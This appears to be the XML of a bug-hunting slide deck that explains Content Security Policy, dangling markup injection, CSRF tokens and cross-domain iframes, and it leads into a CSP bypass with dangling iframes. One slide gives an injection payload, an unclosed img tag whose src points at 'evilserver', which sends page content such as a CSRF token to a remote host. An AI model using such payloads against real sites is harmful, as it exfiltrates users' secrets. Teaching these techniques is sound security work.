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35"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="302" r:id="rId7"/>
    <p:sldId id="294" r:id="rId8"/>
    <p:sldId id="295" r:id="rId9"/>
    <p:sldId id="296" r:id="rId10"/>
    <p:sldId id="297" r:id="rId11"/>
    <p:sldId id="260" r:id="rId12"/>
    <p:sldId id="299" r:id="rId13"/>
    <p:sldId id="300" r:id="rId14"/>
    <p:sldId id="261" r:id="rId15"/>
    <p:sldId id="303" r:id="rId16"/>
    <p:sldId id="308" r:id="rId17"/>
    <p:sldId id="305" r:id="rId18"/>
    <p:sldId id="306" r:id="rId19"/>
    <p:sldId id="307" r:id="rId20"/>
    <p:sldId id="262" r:id="rId21"/>
    <p:sldId id="304" r:id="rId22"/>
    <p:sldId id="309" r:id="rId23"/>
    <p:sldId id="310" r:id="rId24"/>
    <p:sldId id="311" r:id="rId25"/>
    <p:sldId id="312" r:id="rId26"/>
    <p:sldId id="313" r:id="rId27"/>
    <p:sldId id="268" r:id="rId28"/>
    <p:sldId id="270" r:id="rId29"/>
    <p:sldId id="271" r:id="rId30"/>
    <p:sldId id="276" r:id="rId31"/>
    <p:sldId id="281" r:id="rId32"/>
    <p:sldId id="314" r:id="rId33"/>
    <p:sldId id="315" r:id="rId34"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="020B0604020202020204" charset="0"/>
      <p:bold r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Didact Gothic" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Proxima Nova Semibold" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId39"/>
      <p:bold r:id="rId40"/>
      <p:boldItalic r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
      <p:italic r:id="rId44"/>
      <p:boldItalic r:id="rId45"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Proxima Nova" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId46"/>
      <p:bold r:id="rId47"/>
      <p:italic r:id="rId48"/>
      <p:boldItalic r:id="rId49"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Thin" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId50"/>
      <p:bold r:id="rId51"/>
      <p:italic r:id="rId52"/>
      <p:boldItalic r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
      <p:regular r:id="rId54"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bree Serif"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EAAA9B-EEA5-463F-8A6C-B99933DD0DFA}">
  <a:tblStyle styleId="{56EAAA9B-EEA5-463F-8A6C-B99933DD0D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51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575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13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336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08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72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11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7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306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574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65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05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934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728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60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75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42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4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38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56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portswigger.net/research/bypassing-csp-with-dangling-iframes"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hyperlink" Target="https://www.softwaretestinghelp.com/cross-site-scripting-xss-attack-test/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://javascript.inf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solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSP BYPASSING USING LATEST TECHNIQUE</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0"/>
              <a:t>Web Hacking &amp; Bug Hunting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0"/>
              <a:t>Demonstration</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0" y="902208"/>
            <a:ext cx="3222864"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3869375" y="3896090"/>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3306252" y="2757730"/>
            <a:ext cx="220441" cy="20515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3172022" y="4072806"/>
            <a:ext cx="547848" cy="92568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3496259" y="3860864"/>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rot="272167">
            <a:off x="86226" y="4109929"/>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3365682" y="3046112"/>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rot="272167">
            <a:off x="822357" y="4477124"/>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rot="272167">
            <a:off x="1282845" y="4848951"/>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rot="272167">
            <a:off x="732831" y="4188104"/>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rot="272167">
            <a:off x="763497" y="4336777"/>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272167">
            <a:off x="706029" y="4030903"/>
            <a:ext cx="140563" cy="174489"/>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272167">
            <a:off x="1141802" y="4792155"/>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rot="272167">
            <a:off x="1425668" y="4852844"/>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011824" y="145022"/>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106556" y="242826"/>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106556" y="31617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106556" y="389507"/>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3306252" y="3609380"/>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628337" y="4820184"/>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3752179" y="4538274"/>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3955499" y="4535648"/>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3300471" y="2268314"/>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3517672" y="2525548"/>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3642952" y="252466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3508597" y="3172397"/>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3681188" y="3172397"/>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3820174" y="3172399"/>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4068998" y="3172397"/>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rot="272167">
            <a:off x="69461"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42640"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303" y="249883"/>
            <a:ext cx="2532644" cy="2532644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;110;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237374" y="4634699"/>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en-MY" dirty="0" smtClean="0"/>
              <a:t> By: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1" smtClean="0"/>
              <a:t>Ryden</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;211;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-10800000">
            <a:off x="441295" y="4498499"/>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smtClean="0"/>
              <a:t>How Does CSP Works?</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930150" y="2344100"/>
            <a:ext cx="3457500" cy="1420500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>works by restricting the resources (such as scripts and images</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>enable CSP, a response needs to include an HTTP response header called Content-Security-Policy with a value containing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The policy itself consists of one or more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>directives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</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96" y="1737500"/>
            <a:ext cx="4417378" cy="18755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Directives in CSP</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894" y="945152"/>
            <a:ext cx="3785906" cy="4027308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1344796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How Directives Works in CSP</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62" y="1676755"/>
            <a:ext cx="8897592" cy="2276793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3938647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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0"/>
              <a:t>There’s a lot way to bypass CSP. And today we will use the latest technique, which is bypassing CSP with Dangling Iframe.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2786225" y="1552409"/>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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="161234"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How To Bypass CSP?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3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40858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smtClean="0"/>
              <a:t>Dangling Markup Injection</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930150" y="2344100"/>
            <a:ext cx="3457500" cy="1420500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- This is very useful if you don’t find any way to exploit any way to exploit a XSS but you can inject some HTML tags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Works by injecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that is in an unfinished state such as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute of an image tag, and the rest of the markup on the page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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6" y="1319706"/>
            <a:ext cx="4570534" cy="2285267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="622940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Example of Dangling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Markup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Injection</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605213" y="986762"/>
            <a:ext cx="7473083" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lets inject an image tag with an open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attribute:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="https://evilserver/?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When this code is injected, the code between the injection point and the next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>double </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quote  “ will be send to the remote server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This might include something sensitive like a CSRF token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Highlighted code below is the one that got send to the server during injection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY"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390" y="3090508"/>
            <a:ext cx="5066215" cy="1850950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2081658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40858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smtClean="0"/>
              <a:t>What is CSRF Token</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930150" y="2344100"/>
            <a:ext cx="3457500" cy="1420500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- A token for the server to recognize who you are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- CSRF Token is very sensitive and classified</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> - Generated in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pseudo Random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Generator (PRNG)</a:t>
            </a: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02" y="1482193"/>
            <a:ext cx="4792023" cy="2282407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3837491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Cross-Domain Attack Preview</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57" y="1086892"/>
            <a:ext cx="7117847" cy="3725007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1341841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Cross-Domain Iframe</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Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730203" y="1322262"/>
            <a:ext cx="2460329" cy="32826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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1157800" y="4604892"/>
            <a:ext cx="1973525" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.domain1.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1131484" y="2094521"/>
            <a:ext cx="1572242" cy="177617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ight Arrow 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3551736" y="2489930"/>
            <a:ext cx="1769594" cy="651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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730203" y="3882790"/>
            <a:ext cx="2703729" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Iframe1 www.subdomain.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5737474" y="1322262"/>
            <a:ext cx="2460329" cy="32826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ectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6138755" y="2094521"/>
            <a:ext cx="1572242" cy="177617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TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6138755" y="4604891"/>
            <a:ext cx="1973525" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.domain1.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246695" y="2230084"/>
            <a:ext cx="1315683" cy="1302526"/>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5740759" y="3959146"/>
            <a:ext cx="2769515" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0"/>
              <a:t>Iframe1 www.subdomain.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6075653" y="3550230"/>
            <a:ext cx="2601276" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Iframe2 www.domain1.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4042362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1" name="Google Shape;401;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902388" y="218548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908628" y="148503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Bypassing CSP With Dangling Iframe</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Google Shape;404;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947125" y="1710241"/>
            <a:ext cx="2353882" cy="932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Latest technique (14 June 2022) </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
